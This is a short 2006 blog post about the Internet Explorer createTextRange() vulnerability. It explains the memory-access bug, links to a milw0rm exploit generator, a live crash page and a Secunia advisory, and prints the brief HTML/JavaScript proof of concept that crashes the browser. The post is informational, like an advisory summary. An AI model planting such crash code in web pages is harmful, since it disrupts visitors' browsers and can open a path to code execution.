title: Internet Explorer Javascript Exploit
link: http://jj.isgeek.net/2006/04/internet-explorer-javascript-exploit/
author: Jj
description: 
post_id: 165
date: 2006/04/16 17:50:30
created_gmt: 2006/04/16 22:50:30
comment_status: open
slug: internet-explorer-javascript-exploit

This is the `createTextRange()` exploit

It affects patched versions of Internet Explorer 6, 7 with SP2. What the code does is make Internet Explorer encounter an exception that references a distant memory location, where currently there is nothing. But this cuold lead to the execution of arbitrary code found there.

[Here a C program by milw0rm](http://www.milw0rm.com/exploits/1607) that creates `index.html` files that will crash Internet Explorer

[This is a page that makes use of this exploit](http://www.shog9.com/crashIE.html). **This will crash your Internet Explorer!**

The code looks something like this:
    
    
    
    
    
    
    <input type="checkbox" id='c'>
    
    
    
    
    <script>
    
    
    
    
    	r=document.getElementById("c");
    
    
    
    
    	a=r.createTextRange();
    
    
    
    
    </script>
    
    
    
    
    

[It's been classified by Secunia as Very Critical](http://secunia.com/advisories/18680/)